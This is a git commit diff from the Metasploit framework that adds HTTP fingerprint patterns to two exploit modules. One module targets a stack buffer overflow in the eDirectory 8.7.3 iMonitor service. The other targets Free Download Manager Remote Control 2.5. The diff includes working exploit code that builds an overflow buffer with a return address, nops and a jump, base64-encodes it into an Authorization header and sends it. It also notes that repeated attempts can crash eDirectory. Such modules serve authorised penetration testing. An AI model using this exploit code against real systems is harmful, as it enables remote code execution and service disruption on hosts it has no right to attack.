add more http fingerprints
git-svn-id: file:///home/svn/framework3/trunk@9812 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
e765553d26
commit
6d23204c6f
|
@ -14,6 +14,8 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
HttpFingerprint = { :pattern => [ /DHost\//, /HttpStk\// ] } # custom port
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -23,6 +25,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module exploits a stack buffer overflow in eDirectory 8.7.3
|
||||
iMonitor service. This vulnerability was discovered by Peter
|
||||
Winter-Smith of NGSSoftware.
|
||||
|
||||
NOTE: repeated exploitation attempts may cause eDirectory to crash. It does
|
||||
not restart automatically in a default installation.
|
||||
},
|
||||
'Author' => [ 'anonymous', 'Matt Olney <scacynwrig@yahoo.com>' ],
|
||||
'License' => BSD_LICENSE,
|
||||
|
|
|
@ -14,6 +14,13 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
# w/auth required: [*] x.x.x.x ( 401-Basic realm="FDM Remote control server" )
|
||||
# w/o auth: <title>FDM remote control server</title>
|
||||
# w/o auth: <div align="right"><span class="style1"><span class="style4">Free Download Manager remote control server.</span><br />
|
||||
# <span class="style4">Version 1.0.</span> </span></div>
|
||||
# Extra url: /compdlds.req
|
||||
HttpFingerprint = { :pattern => [ /(FDM Remote control server|Free Download Manager)/i ] } # XXX: A custom body check would be nice too
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -22,8 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Free Download Manager
|
||||
Remote Control 2.5 Build 758. When sending a specially crafted
|
||||
Authorization header, an attacker may be able to execute
|
||||
arbitrary code.
|
||||
Authorization header, an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -57,11 +63,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
sploit = rand_text_alpha_upper(1012 - payload.encoded.length) + payload.encoded
|
||||
sploit << [target.ret].pack('V') + make_nops(4) + [0xe8, -575].pack('CV')
|
||||
sploit = Rex::Text.encode_base64(sploit)
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
send_request_raw({
|
||||
'headers' => { 'Authorization' => "Basic #{Rex::Text.encode_base64(sploit)}" }
|
||||
send_request_raw(
|
||||
{
|
||||
'headers' => { 'Authorization' => "Basic #{sploit}" }
|
||||
}, 2)
|
||||
|
||||
handler
|
||||
|
|
Loading…
Reference in New Issue